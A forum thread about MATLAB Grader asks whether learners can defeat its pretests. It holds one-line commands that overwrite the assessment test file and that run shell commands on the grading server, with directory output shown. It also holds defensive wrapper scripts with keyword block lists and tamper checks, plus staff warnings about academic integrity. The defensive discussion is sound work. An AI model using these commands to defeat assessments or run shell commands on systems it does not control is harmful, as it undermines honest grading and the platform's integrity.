Can MATLAB Grader questions be attacked by hackers through the pretest?
for example:
Using ethical hacking, the following was obtained

then replaced in the Learner Template

Accepted answer
More answers (2)
Jeff Alderson
30 Apr 2022
1 vote
Every time a learner solution is submitted, the solution is recorded and made available to the instructor. Solutions that use obvious attempts at circumventing assessment tests would be very transparent when compared to learner solutions that attempt to solve the problem in good faith. Additionally, the instructor can check for the presence of certain keywords and functions and fail the assessment if they are found. Similarly, the instructor could look for the presence of keywords necessary to solve the problem in the desired way, and fail the assessment if they are not found.
1 comment
Hermes Pantoja
1 May 2022
Nonsense
hack:
fprintf(fopen('./solutionTest.m', 'w'), '%s', '');
always works even if 'fopen' and 'fprintf' keywords are disabled
15 comments
Jeff Alderson
15 Dec 2024
Edited: Jeff Alderson
16 Dec 2024
It is irresponsible to encourage learners to circumvent assessment tests in the way you are proposing. Each and every submission attempt by a learner is recorded and made available to the instructor. Attempts to circumvent assessment tests in the manner you are proposing are highly visible to instructors and may be in violation with the academic integrity policies of the course/school where the product is being used.
Lastly, rest assured that the development team for MATLAB Grader is monitoring this article, and has already made note of this proposed attempt to circumvent assessment tests in the product. Even though the product may appear to accept such a circumvention submission by a learner, it would not be safe to assume that the learner’s attempt at circumvention is not known to MathWorks or the instructor for the course where the product is being used.
The attack consists of one line, so it is easy to miss it among many other commands. The instructor who does not take this type of attack into account will have no choice but to accept the answer!!! It is crucial to protect the attacked file from modification!!! Protection against the attack with the save command has not been successful for two years, so it will be the same with my proposed attack!!!
Piotr Kot
16 Dec 2024
I've actually tried a few other attacks, the Matlab Grader team can find them in the logs of one of my courses. There's also a vaccine there. But I won't spoil the fun :)
Piotr Kot
16 Dec 2024
Moved: John D'Errico
16 Dec 2024
I think the team should speed up their work. Things are starting to get really interesting....
fprintf(fopen('try1.m','w'),'%s',"system('id')")
try1
Piotr Kot
18 Dec 2024
Moved: Cris LaPierre
18 Dec 2024
The MATLAB team doesn't take these types of reports seriously, which creates a unique opportunity to see how their operating system works:
fprintf(fopen('try1.m','w'),'%s',"system('cd /usr/bin; ls -la|head')")
try1
Output:
ans =
34
total 76736
drwxr-xr-x 1 root root 6144 Dec 17 16:22 .
drwxr-xr-x 1 root root 4096 Dec 18 05:35 ..
-rwxr-xr-x 1 root root 55744 Apr 5 2024 [
-rwxr-xr-x 1 root root 4486 Apr 12 2024 aa-easyprof
-rwxr-xr-x 1 root root 18744 Jul 18 18:28 aa-enabled
-rwxr-xr-x 1 root root 18744 Jul 18 18:28 aa-exec
-rwxr-xr-x 1 root root 18736 Jul 18 18:28 aa-features-abi
-rwxrwxrwx 1 root root 16422 Aug 15 08:26 add-apt-repository
-rwxr-xr-x 1 root root 14720 Aug 9 02:33 addpart
ans =
0
Piotr Kot
18 Dec 2024
Moved: Cris LaPierre
18 Dec 2024
And all it would take would be to remove write permissions in the directory
Piotr Kot
18 Dec 2024
Moved: Cris LaPierre
18 Dec 2024
In such a situation, I am posting my solution to the problems described above. You should prepare a solution.p from the solution.m file and add it to the task so that the student cannot do the things described in this thread
solution.m :
fileID = fopen("solution.p", 'r+');   % open this wrapper itself read/write; fclose errors if that failed
fclose(fileID);
clear fileID;
kod = fileread("solution.m");         % the learner's submitted code
forbidden = ["java","pyrun","matlab","fileattrib", "save","load","matfile"];
pattern = strjoin(forbidden, '|');    % one alternation regex over the forbidden tokens
if ~isempty(regexp(kod, pattern, 'once'))
    error("Forbidden!!!");
end
copyfile('solution.m', 'solution1.m');   % run the learner code under a name that does not collide with solution.p
fileattrib '.' '-w' 'u'                  % drop the owner's write bit on the working directory ...
fileattrib '*' '-w' 'u'                  % ... and on every file in it
evalin('caller', 'solution1');           % execute the learner's script in the test workspace
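The accepted answer proposes a keyword screen and the wrapper above adds a write-permission lock; both only try to prevent writes. The following is an added example, not code from this thread, from MathWorks or from MATLAB Grader, that keeps the same wrapper structure but makes tampering detectable instead: it snapshots every file in the working directory before the learner's script runs and errors if anything was created, deleted or rewritten afterwards. The file layout is assumed from the posts above (learner code in solution.m, assessment tests in the same directory, the wrapper compiled with pcode to solution.p so it shadows the learner file); the forbidden-token list is an assumption to be adapted per course.

```matlab
function solution()
% Tamper-evident wrapper for a MATLAB Grader script problem (added example).
% Assumed layout: saved as solution.m on the instructor's machine, compiled with
% pcode to solution.p and attached to the problem, where it shadows the learner's
% solution.m; the assessment tests live in the same working directory.
    before = snapshotDir(pwd);             % every file in the working directory, as bytes

    % Static screen, same idea as the keyword check in the accepted answer. The token
    % list is an assumption and deliberately coarse: a name can always be assembled at
    % run time (e.g. feval(['sys' 'tem'], ...)), so the dynamic check below is the one
    % that matters.
    learnerCode = fileread('solution.m');
    forbidden = ["java", "pyrun", "system", "unix", "fopen", "fwrite", "fprintf", ...
                 "fileattrib", "save", "load", "matfile", "copyfile", "movefile", ...
                 "delete", "rmdir", "mkdir", "eval", "!"];
    hits = forbidden(arrayfun(@(t) contains(learnerCode, t, 'IgnoreCase', true), forbidden));
    if ~isempty(hits)
        error('Forbidden construct(s) in solution.m: %s', strjoin(hits, ', '));
    end

    % Run the learner's script under a name that does not collide with solution.p,
    % in the caller's workspace so its variables are visible to the assessment tests.
    copyfile('solution.m', 'solution1.m');
    before('solution1.m') = before('solution.m');   % the copy is ours; do not flag it
    evalin('caller', 'solution1');

    % Dynamic check: any file created, deleted or rewritten during the learner's run is
    % treated as tampering, whichever function or obfuscation trick did it. This catches
    % an overwritten test file or a dropped try1.m; it cannot see writes outside the
    % working directory, which only the platform logs cover.
    changed = diffSnapshots(before, snapshotDir(pwd));
    if ~isempty(changed)
        error('Working directory modified during the learner''s run: %s', ...
              strjoin(changed, ', '));
    end
end

function snap = snapshotDir(folder)
% Map file name -> raw bytes for every regular file directly inside folder.
    snap = containers.Map('KeyType', 'char', 'ValueType', 'any');
    listing = dir(folder);                 % includes dotfiles; '.' and '..' are isdir
    for k = 1:numel(listing)
        if listing(k).isdir, continue; end
        fid = fopen(fullfile(folder, listing(k).name), 'r');
        snap(listing(k).name) = fread(fid, Inf, '*uint8');
        fclose(fid);
    end
end

function changed = diffSnapshots(before, after)
% Names present in only one snapshot, or whose bytes differ between the two.
    changed = {};
    names = union(keys(before), keys(after));
    for k = 1:numel(names)
        n = names{k};
        if ~isKey(before, n) || ~isKey(after, n) || ~isequal(before(n), after(n))
            changed{end+1} = n; %#ok<AGROW>
        end
    end
end
```

The design choice is to compare bytes rather than permissions or timestamps: a learner who regains write access (chmod via a shell, or any of the routes the thread describes) still has to change file contents to alter the outcome, and that is what the comparison sees. If a question legitimately expects the learner to write a file, register its name in `before` the same way `solution1.m` is registered, or the wrapper will flag the expected output as tampering.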
Piotr Kot
18 Dec 2024
Moved: Cris LaPierre
18 Dec 2024
At the same time, I am announcing a competition to break through my security
Piotr Kot
18 Dec 2024
Moved: Cris LaPierre
18 Dec 2024
Apparently my solution actually exploits another vulnerability
Piotr Kot
18 Dec 2024
Moved: Cris LaPierre
18 Dec 2024
By the way, let's note that my solution gives a unique possibility of control over the student's solution. The solution.p file always starts, which allows copying the student's solution from the solution.m file to another and starting it. Of course, if the student had the possibility of overwriting the solution.p file, it would be a problem.
A heartfelt request to the Matlab Grader team to prepare a similar but already safe control option as part of their solution.
Cris LaPierre
18 Dec 2024
If you would like to provide feedback to MathWorks, you can do that here: https://www.mathworks.com/support/contact_us.html
Piotr Kot
18 Dec 2024
Edited: Walter Roberson
18 Dec 2024
Piotr Kot
20 Dec 2024
One more small note. My attempt to solve the problem can also be overcome. It turns out that the /tmp directory is available for writing to anyone who wants it. And then, of course, we run a script with any commands we want.
Piotr Kot
20 Dec 2024
And finally, to sum up the Matlab Grader team's response:
"The behavior explained through the reproduction steps is intended. The MATLAB session running within Grader operates within an isolated containerized instance. Logged-in users are permitted to run MATLAB functions, including commands that interact programmatically with the operating system and the MATLAB application. Therefore, executing the 'system' command does not introduce any additional risk to MATLAB Grader."